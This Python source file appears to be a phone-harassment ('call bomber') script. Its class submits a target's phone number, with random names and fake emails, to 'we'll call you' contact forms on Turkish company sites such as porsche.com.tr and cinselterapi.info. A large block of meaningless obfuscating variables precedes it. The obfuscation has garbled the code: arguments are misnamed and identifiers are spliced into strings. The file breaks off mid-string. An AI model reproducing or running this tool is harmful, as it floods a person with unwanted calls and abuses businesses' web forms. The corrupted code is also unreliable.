lIIIIIllllIlIIIlllIllllIIllllIllIlIllIIlllIIlIllllIlIIlllIIllIIlIIlIllIlIlIIIIIIIllIlIlIlIlllllIlllIIllIIlIIlllIIlIlIlIIllIllIlllIllllllIIlllllIIIIllllIIIIIlIllIIlIlIllllIIIIIlllIlIIllllIllllIlIlI = "PLMwBSXqUTHwjVSCzPRTnSLqHZulQeBKgeszSKyrOIhimwOZpbgQOGYvHmEmNDmuUktjQmWrqmIawwc"
AaaaAAAAaaAAaaAaaAaAAAaaaaAAaaaAaaAaAAaAaAaaaaAAAaaAaaAAaAaaAaaAAaaAAaAaAAaAAAAaaaaAAaaAaAAAAAaaaAaAAaaAAAaAaAAaAAAAaaAAAaAAAaaAAAaAAaAaAAAaAAAaAAaaAaAaaAAAAaaaaAAaaAAAaAaAaaaaaaaaaaaaAaaAaaAAAA = "CyMxlrwbbcNsBuYosqoTViYoVHKaexhrIdoqxjTcpFjLXExQugyPeWzyoYKhBQgWzJlaOSDzgXCCBsH"
S16764095562383435192 = 940
fMiwlioMqzWKrGJlsPmgZzPCapgjCOiWlzrkwABAYSYTVhCqcQAJWzStEQOpSmXiPMczDRyWnTUxeTc190 = "zRJljsZMCifLaLblIkzjwvaJAILtCrZlCxXRDQAieybEysBKBbeWelHmMpfaWyCnPTDCVKklbKDXIXc"
AAAAaAaaaaaaaAAAaaAaaAAaAAAaAAaaaAAAaaaAAaaaAaAaAaAaaAaaaaAaaaaAaaaaAAaAAAAAAaAAAaAaAaaaaAAaAAAAaAAaAAAaAAAaAAAaAAaAaaAAAAAAAAaAaaaAaAAAAAaaAaAAAaaAAAAaaAaaAAaAAaAAAAAaaAAaAaaAAAAAAAaAaAAA = 455
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ = "EdQZHiFkQLKJlLaeMdTKrLqKgmjdYZvWtEktudtHtiNmNrhQTYSbXIImXpvxuomiPwzzObnOQbszMKt"
AAAAaAAAaaaAAAaaAAAaAaaAaaAaAAaaaaaaaaaAAaAAaaaAaAAAAAAaaAaaaAaaaAAAaaAAAAAaAaaAAaAAAAaaAAAAAaaaAaaaAaaAaAAaAaAaaaAAAAaAaAaAaAaAAaaAaAAAAAaAAAAAaAaAAaaAAaaAaaaaAAAAAaaaAaAaAaaaAaAaaaaa = 367
W16764095562383435182 = "LHcNYDJhWAlZajrxxAyEgvwpwZPDgtNKdykZVFUMxXwlfACwWjBHNnBmvCRIgRRrcemRWJFcWAKpcwq"
aAAAaaAaaaAaAAaaaAAaAAAAAaAAaaAaaaAAaAaAAaAaAaAAAAaAAaaAaaaAaaaaaaAAaaaAaaAAAaAAAAaAaAaAAAaaAAaAaAAAaAaaAAAaaaaAAaAaaAaAaAaAAaaaaaAAaaAaaaaAaaAaAAAAAAaaAaAaAaaaAAaAaAAaAAAaaAAAAAAa = "bnIZxilBxeMaCBwNeejrWfzwtyKNwLNUxLBexbNwPQJspXgyzsPddCGqsQWxlGyOWFUwIpaVAXySoVW"
A16764095562383435178 = 340
lIIlIllIllllIlIIIlIIlIIllIIlIIIIIIIIllIIlllIIIIIlIIlllIIIlIlIlIIIlllIlllIlllIlIIIlIllIllIlIIlIIllIIllllIlIlllIIIIllllIIllIllIIllIIllIlllIlIlIIIIllllllIIIlIlIIlllIIlIIIIIIIIlllI = "bOMjwHGgufayCpNitnxepoRGnYYNbPdyynnFEwXjIZoyVIRYbIRYctliSHvvceUMobVRoSRUpihAGOT"
UITQdelMWDLAViLUErqhrWjLLbbmBHwztexKqkMhfBJUdYGYfjbeGsSXcjZkozCSaGDsjhDTFUlFdLo174 = "msqJCDSRdmqqiUlVgKvmRDLTRkucVGRQDxnDvsTxSFurYyNwPOEVSpYsIuXImJinFKZDlxjtOAxWcbM"
y16764095562373443172 = 357
d170 = 450
Z168 = 317
P166 = 133
n16764095562373443164 = "bwtQkKFogFIcVTTgpRLyGUPVMtjLeIbTISRtxHWRRBniwgSbklAaKXkxsUZbrKUKQdLZRQIvIsxjjni"
PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP = "XMkdrwRmbvjPLPUhPuIdrrONekcZfACDYkeaUTFsPBCVzZhGvdusIwprHCfFHoVmQUjRAUMveVfqWMZ"
N160 = 87
g158 = "CJStcQauvxiyRsORnMjTijIWYrqcXeHITxUMTaNDKlTwMbkwnXdgwVYhlOBQvnjHHwwvgzPSFxcXEXL"
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk = 214
F154 = "kYlLTPxVtVddILIxvCzVrwpmWnaetNPmJuftlWoVwrqBEbFuxLKDFQEGGqWHunMweREgsXQuQIOyjff"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa = 614
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX = "oxPfhnLLZIMvinduzglglxvsVIlsNzDGBNbUvLSnrvtPQbykxMGBNkibdUgipgOqwtYTGAYgCEOxUjR"
AaAaaaAaAaaaAAaaAAAaAAAAaAAaAaAAAaaaaAaaaAaaAAAaAAaAaaAAAaAaaaaaAaAAAaAAAAaAAaaaaaAaAaaAAAAaaAaAAAaAAAAAAAaaaaaAaaaAAAaaAAaAAaaaaaAaaaaaaAAaAaaaaAaA = "RTxKCQCNfpzuehBMgmCoDokTyLViXYmiHABGQrsFBtKtAGzIVvhgfhfztkjTqlcrEgPKRhCtQeuDfDX"
JuSKEdoqktLRVmzbmtSvXJEkEOWGOxdbESFurnwpVqIULpoxhykNiWePKdLSHGqPfAMofEttZKAzkJL146 = 284
AaaAAAAAaaaAAAaaAAaaAaaAAAAaaAaaAAAAaaAaAAAAaaaaAaAAAaaAaAaaAAAaAaAAaAAaaAAAaAaAAaaaaaaaaaaaAaAAaAAaAAaAAAAaaaaaAAaaAAAAaaaaaaaAAaAaAAAaaaaAAaAA = 435
M142 = "DGTUYgKpqvPHoNIeqrTmacICLToYiBJLkMaWiArnKhsCUBHMnMCjyjsRTzQWiXaBNZcUADGFDbgZAlM"
IgPMmtVkgrUFFdzadsBCKqhhkUznxKNJKEmmRCYfytDfeTXVKdMcndAFmApIkmiLjjgwrYcIjNKpyFo140 = 397
O16764095562363472138 = "nmaKzBBkDiyIDIqQnbUneffaIUSsQmHeTyZBeWMvYEogahHwrkmXZkKxOaLqvGdmzidUhmqfRiKanet"
S16764095562363472136 = "learIpoNisyCufhhiFifqbggFdyfFXMVFjRJQitckBvGhjUnhALhyidONlavqoEqXXMCWZVejKDcOhM"
j134 = 570
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII = "wLVmbOqFYsvjugWlPYFvVEgzJpgNTWsqnvLQKGRFhFFRsebNeytRMimPBGHACtdzWFLozdOGxwRDdFt"
r16764095562363472130 = 298
a128 = "VdLPasVmFKgOSEeszLbCAcSGqMXILqxFFOeYAPegtZrKyBGWyORjqKBVAHRsQbDvoQbwNVFaBiQnkiG"
IlIIlIlIllIlllIllIllIllIIIIIllllIIIIlIIlIlIllllIIIlllIlIlIlIlIlIllllIllIllIllIlIlIIIIIllllIlllIlIlllIIlIlIllIlIIlllIIllllIIIll = "cBIeeIRoXzbhxYDzHVIzbypYtzjOtZokXkOvZVnMjldXcBhwSNlCFXIxammHgnsqaOvAJdygpHSXcKO"
g124 = 589
Y16764095562353506122 = "AlHgMTIZtqRNJggCwGJKxqUEHVbFBscfKCidjjGKbcFCJIbXfrTBGvNOJRRGGKRKmdrZKBHCyJKFbmI"
llllllllIlIlIllllIlIlIlIlIlIIIlIlIllIIlIIlIIllIIIIllIIlIIlllIlIlIlIIIllIIIIllllIllIIlllIIlIIlllllIIIlIIlIlIllIlIIlIIIIll = 639
AaAAaaAAaAAaaaaAaaAAAaaaaaaAaaAaAAaAaaaaAAAAAAAAAaaAAAAaAaAAAaaaaAAAAAaaaAAaAaAAAaaaAAaaaaaaaAAAaaAAaAAaAaaAAaAAAaaaaA = 224
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss = "ndLtgzGllxfinIDwNPuLkorWgSLkqfNYHyLzYXZsnwgIFDoahLyXCLzmVwzdwdicNvNymbnFmtyMdqB"
p16764095562353506114 = "tGeOTYONjhIFJqhofIYamMlZkMiauOnlpByvcFoHgeWNBaSrNNcjUQSIVHdVeNQPIoZhHdwHrjVbmaC"
w112 = "kGKDCsSBSichMjbbRgHCWRnAcHvaEbDXOntXdnGQeVqcefdtLMNZVKdVlkobaBRXqqACNsydFWEUwVv"
XmVsnoxqaLpLGkcgFIuqnoXEclvFxPGBvZZfSJOeJdmwOwNwXFhjwFAcZCfoGYfYDoOIdctSxzAUTyF110 = "nEwusVbzwgigdlGBokTpiAcjatMnxEdCAYebVLhKWwXaGPqQBZulXzMhRFGLlBXUyWVAZUWxcWmWOHw"
JrTHakYqcnoaTkxcAbPPZTuDqqSDVhkdEOVHQMAJYVKcPSTkNuuBUeVcPtGAGwtXFHErLvIbCVhXchU108 = "ZHjrJKidLYbyyqryPRFuZiZKzEGLQIKrOhZTlcARSOSCFpzhkAGvviApDPpRNUswlCjbFvUWAhkHBCF"
AaaaaAaAAAAaAAAAaAAAAAaaAAaaaAAAaAaaAAAAaAAaAaAaAaAaaaaaaaAaaAaAAaaaaAaaAaAaaaaAAaAAAAAaAaaAAAAAAAaaaaaaAA = "vTKYZbkOFnFxZPrcwkVXmbtTXaiJAKnAJIcXmBnlEQMoJptzPoVKnTDgaYrpDicBYfGzbeKJQbCLeOF"
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn = "lUsJxGSwpZrpeJsJgPZEAoxcHzULiWfwFiGttMnxkRJaHgwelEkCzEkxxMDWIljzmhriBkzEdsKBLgt"
llIlIIlIllIIllllIIIlIIIIlllIIlllIlIllIlllllIIllIIlIlIIlIllIIlIllIlllIlllIlIlIIlllIIlIIIIIllIllIIIlIIII = "BldUOXEjwTNIccoPjUydacWtdXtdlhJxCxDwIfNCLqcLWxNmDYJShiNIxbAHltUEoCHhjuIvwKSnKLc"
AAaaAAAaaaAaaAAAAaaaAAAAaAAAAaaAaAAAAaAaaaaaAaaAAaAaAAaaAAaaaaAaAaAaaAaAaaAaaaaaAAaAAaAAaAaAAAAAaAAA = 671
lIlIllIIIIIIIlIlllIIIlllIlllIllIlllIllllllIlIllIllllIlIIIIIIllllIIlIlIlllllIlllIlllIlllIlllIIIIIII = "AitiIrGTCqqPiMSbifDxjZgvQGVjZshzSUVXTknrGKyJtYpoyXaUWUhaxWBbbGJetHeXpvSIbNMRkOp"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = 288
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG = 963
h92 = "CQoDDwlTKLlvJoXCZlTEqiOklYJHOxmitRWjjmRAILCGqIGvcuuLtZpsnhVntCDNzcNDDZNtUPWmYzL"
I167640955623435290 = "XlDPqhhpFYfQVRxbbwVKmwquMWcDdqMeMrDYzUBrsrUQzqPRdDMVzWTZXfyCphslkkLnqqnBUFZGayn"
aaAaaaaaAAaAaAaaAaAAAaaAaAaAAaaAaaAAAAaaAAaaaaaAAaaAaAaaAAaAaaaaAaaAAaaaAAaAAAaAAaAaAaAa = 144
IlIlIlIIIIlIIIlIlIIlIIlIlIllIIllIIllIIIllllllIllllIllIlllIIIIllIIIllllIllIllIlIlIlIIll = "apwccVNMQWnpaBmlrWoxJiLlBcZgakiTXmmpEmPlRPcZnuYKdsIsBJebqrcqDaabviHiCBfbCqJHgeU"
M84 = "kVuyzCWOMNtXtqeDGeUHvQwRhoyWPDhMnvKsLOXxgnYUAqkwathNaCBAysaTfiMWqkWEmupjBnkVTjN"
aaAaAaAAAaaAAAAAaaAaaaAaaaaaAAAaAAAAAaaAAaaAaaaAAAaaaAaaaAaAaAaaaaAaAAaaaAaAaAaAAA = 156
aAAAaaAaaaaAAaAaaaAAAAaaAaAAaaaaAAaAaAaAAaAAaaaAAaAaAAaaaaAaaAaaaaAAAAAAAaAaaAAA = "cdQxPPOspkLbyFtlmoSRSLaMHQdYeGTTUCyOcZxQFUkhibTUYFoAaCtpBubeXBuHvoupCeqnNiJzglr"
AAAaAAAAAaaaaAaAAAAAaaAAAAAaaAaAAAaAaaaAaAaaaaaaAaaaaaaaAaaaAaaAaaaAaAAaaAaaAa = "MSnTohqssondgrKFljeWCEYiYBbPjgWpXBpTfAhDIFaGFCjxCiockuTXgKQwZcnUSMUwMEQcbchdeLA"
AaAaaaaAAaAAaAaAaAaAAaaaAAAaAAAAAAaaAaAaAAaAaAAaaAAaaAaAAAAaaAaaAaAaaaaAaAAa = 229
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb = 272
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb = 316
E167640955623335570 = "wsZNXtowCqYoEhjieZYKUZozbGdqiZyyFshTFkjaKWFrlQPaRzrJNNBIcyvnGRoqHIlGrOcfhDfXrTv"
u68 = "cDhVyDbNvKfJXslQavwmotKZlmJfaRplZrTsDztVZxhGkqTJKglhVXktsFWUsWrUtESJFiNUixSDITg"
gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg = "EHHtPdzSRwzrtqYGRvXKdzgrEdDIbOrtvzLcBoqBROGDrQILPIGnyNfEQPGjVBSRjbiBIyFhccHuseh"
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 546
S167640955623335562 = "rdfYdUfxHNSpTUlDpDulbuEfdpvkQxobJBZJweiACDfPEnXHvLtPdpfdqikOoOGSKpbkmnyzstputEU"
qyAdKIvgBqVibaSlsMkcdrgYvTsNnpEMmnrjOQcHRuLiXkEpNaSofoKbyqVLdfSKOMAXxbTnIxdgHpi60 = 197
M167640955623335558 = 334
l167640955623335556 = 694
ssssssssssssssssssssssssssssssssssssssssssssssssssssss = "MSaiAVtMOvmsCItEWlTFxsEZNelaFcSUIwKxKHGlagwBDnRNHMgIzzJKKNcQbmGqvqBieaNfjxyIVim"
R52 = 847
K167640955623335550 = "bbRJpGKnvEfMgmyybUgxFqFEsARRBiIhmrkhfUvruoOFGyrIOcFoDwFLOXgudWEZzoGWTpSlGhVuFmN"
AAaAaAaaaAaaaAAAaaAaAAaAAaAAaaAAAaaAAAaaaaAaAaAA = "jjvcPoZLotiGEUNhcpPbYMMOoQBFaoePgfRuLjIwdETElfEAtSPWfewgmahKXQnblDqSbBeDnbRJPsX"
UCiEMlWkjYCcWyvFRPtVXVFswfBLwexKxptjUMLkJadVxwJWXingByCDMTmjGKPXYQdtfDjGLTCMGWQ46 = 336
q44 = 233
W1676409556232358542 = 363
aAaAaaaaAaAaAaAAAaAAAaaAAaAaaaAaAAAaAAaA = 216
N38 = 326
AAAaaaaaaAaaaaAAaAAAaaAAAAaAAAAAAAAa = 506
h1676409556232358534 = "LvZTIEOFxPsiQiVSRMHMVLsCsGOJXtnAElaKbWIinwoaZFRquiZWsAXdFnUmNfMpwedqWJEDrWSsKtz"
rptekauLZVoRiCXBpZTAnUtjgDtGnqxfYrFeisIrDJrWZsVEhlVSqumPxQbIyCBBUmTZOSMoyWrsVTs32 = "krkQmAWbiPvaOFxNWuVUTCMVvkOpRWpLpOFuqJzEXzeuntFKUalBbgKWprqEYSZKcwjSRFwKFnmFAiS"
IIIIIllIlIIIIIIlIIIIlIlIIllIlI = 618
PLzNPcVnOfvHDmipcedQWrPpuzbFqSKyhrcLOKWKLKiuceGBrsGvzQRbINCWysudylvrrpnrhXJRIoz28 = "aVSjWQYPgvuQGamDCYiAFPLdkXIwYJKrfbUWuCSGzsDIwXnTgNZhrEaUXIkOakinQkaAwDWDiXEmUwu"
IIlllIllllIIIIIIllllIlIlII = "nhlxCwMqavjBsVSckTiUtEhwzmNYsQkcZAJQWuMOiRcCNZQxZSaeXjlXGwbRDqlCSdhVlPjnKhvnyWc"
aAaaAAaaaAAaaaAAaAaAAaAa = "JVRjkNOGWKZESMxMJACPNrrDdDlDAfhkIZbhRLlHOCKzgXnWvXengIdQsAtaqibVkuwxAOkpwEIwhme"
lIIlIIIIIlIIIlIIlIIIII = 265
aAaaAAaAAAaAaAAAAAAa = "rBiGsWljAoxkypDKEOvZpwJxPnZxSxpKzyKpsrgwZpAxeEFAuytQHRfkwVGXuXdWpmewzWdBFzXUddV"
pppppppppppppppppp = "yPqeBgzRHWYMxbYtvNSdWyhWCiPFfMqEiEXAnYckWvcMLeSRJrAGNznsxEcuYmtIxHrQrRpQJthxVQW"
IlllIIlllIIlllll = "swVSTAVcQZhWnUCfRgnonvNTAIkvSPzzEIIbGeHfkCUPpkQowhLxYZtgXJhUiUzmgQmQsxjmAIiMVRF"
rDFLsXaxzvSwFtNIOqfBjVoyPAJFDngsrWobgjJpgakXfEGYBmNryVqAyXlhZtjapQfVLcOSwkfVgoN14 = "CmgpUXpIxsNKoJMSGDRpBMwRbaFlYFoyMNhppBmIkRlCwHCzHhRMEEjDPeMotGLCpxSUmZRFfzuJANj"
y1676409556231361612 = 276
vhGyAwDVafaSQtYhZaMSFOssoWtQJbCFkEYfxHTteTsaqgebSEJkEwLWJVuWoPDjVLDSjtvCNxofKFf10 = 690
MlHwTdNPMwiJZxQpITwbvwhONPRjYgoHFZKZJYPZBSjnvrUWiLijVVCQyvHPsGPwUCzpracaEVAFYnG8 = 252
IIIlII = 291
E167640955623136164 = "beLeJdiyCAQIEHpodMrEmqgUhLCNBFiQZdZXtspKGByfNfqCAVuIBiOgdXLuJcsXofFcFFWHiHBUlYi"
II = "eiJnQVfgHJtrvpbrYRLNFrwAuBWmIBQqlqUDmVgqBSGCCRQyfTSTPCamKbmFJQZuQIiZbInmssNfBax"

import requests
from random import choice
from string import ascii_lowercase
from colorama import Fore, Style
from datetime import date

class SendCall():
    E16764095560847461 = choice((requests.get("https://gist.githubusercontent.com/tolgarecep/251c7fcde01f9ea0a8f3883243c360a5/raw/4707ba1a669b32632ced646e302551bbfd5a904e/tr-names.txt").text).splitlines())
    LL = choice((requests.get("https://gist.githubusercontent.com/emrekgn/493304c6445de15657b2/raw/5ff32a4b0baa4999748d69650754243fd0fd6ed9/soyisimler").text).splitlines()).lower()
    lll =  date.today().strftime('%d-%m-%Y')
    AaaA = 0
    

    def __init__(self, EEEEE, yUKBQxZFbXiDnNOVDYSZktIpZgJesIIRtZosqKXrnBVCLVHPZJkHDbfzuYpTqPLMXNAXIQnIvvLaIau6):
        self.phone = str(EEEEE)
        if len(yUKBQxZFbXiDnNOVDYSZktIpZgJesIIRtZosqKXrnBVCLVHPZJkHDbfzuYpTqPLMXNAXIQnIvvLaIau6) != 0:
            self.mail = yUKBQxZFbXiDnNOVDYSZktIpZgJesIIRtZosqKXrnBVCLVHPZJkHDbfzuYpTqPLMXNAXIQnIvvLaIau6
        else:
            self.mail = ''.join(choice(ascii_lowercase) for i in range(19))+"@gmail.com"

    #porsche.com.tr
    def Porsche(self):
        try:
            eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8 = "https://www.porsche.com.tr:443/biz-sizi-arayalim"
            p9 = {"firstname": self.ad, "lastname": self.soyad, "email": self.mail, "EEEEE": self.phone, "dealer": "4830", "approved": "on", "contactapproved": "on"}
            DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10 = requests.post(eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8, p9=p9, m12=False)
            if DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10.status_code == 302:
                print(f"{Fore.LIGHTGREEN_EX}[+] {Style.RESET_ALL}Başarılı! --> porsche.com.tr")
                self.adet += 1
            else:
                raise 
        except:
            print(f"{Fore.LIGHTRED_EX}[-] {Style.RESET_ALL}Başarısız! --> porsche.com.tr")
            
    
    #pratikdepo.com
    def Pratik(self):
        try:
            eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8 = "https://www.pratikdepo.com:443/biz-sizi-arayalim-tesekkur"
            p9 = {"E16764095560847461": self.ad, "telefon": self.phone, "email": self.mail, "onay": "1", "iletisim_arayalim": "ok", "source": ''}
            DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10 = requests.post(eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8,  p9=p9)
            if "Kaydınız alınmıştıDmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10." in DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10.text:
                print(f"{Fore.LIGHTGREEN_EX}[+] {Style.RESET_ALL}Başarılı! --> pratikdepo.com")
                self.adet += 1
            else:
                raise 
        except:
            print(f"{Fore.LIGHTRED_EX}[-] {Style.RESET_ALL}Başarısız! --> pratikdepo.com")
        
    
    #cinselterapi.info
    def CinselTerapi(self):
        try:
            eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8 = "https://www.cinselterapi.info:443/wp-PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP/contact-form-7/v1/contact-forms/1919/feedback"
            AAaaaAAaAAaaAaAAaaA = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0", "Accept": "application/PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP, BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB/javascript, */*; AaaaaAAAAaaAaAAAAaAa=0.01", "Accept-Language": "tr-TR,tr;AaaaaAAAAaaAaAAAAaAa=0.8,en-US;AaaaaAAAAaaAaAAAAaAa=0.5,en;AaaaaAAAAaaAaAAAAaAa=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-p9; c24=---------------------------321748292840246706102673633934", "Origin": "https://www.cinselterapi.info", "Dnt": "1", "Referer": "https://www.cinselterapi.info/biz-sizi-arayalim/", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Te": "trailers"}
            p9 = f"-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n1919\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_version\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n5.1.7\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_locale\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nen_US\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_unit_tag\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nwpcf7-f1919-p1927-o1\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_container_post\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n1927\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"E16764095560847461-LL\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.ad} {self.soyad}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; 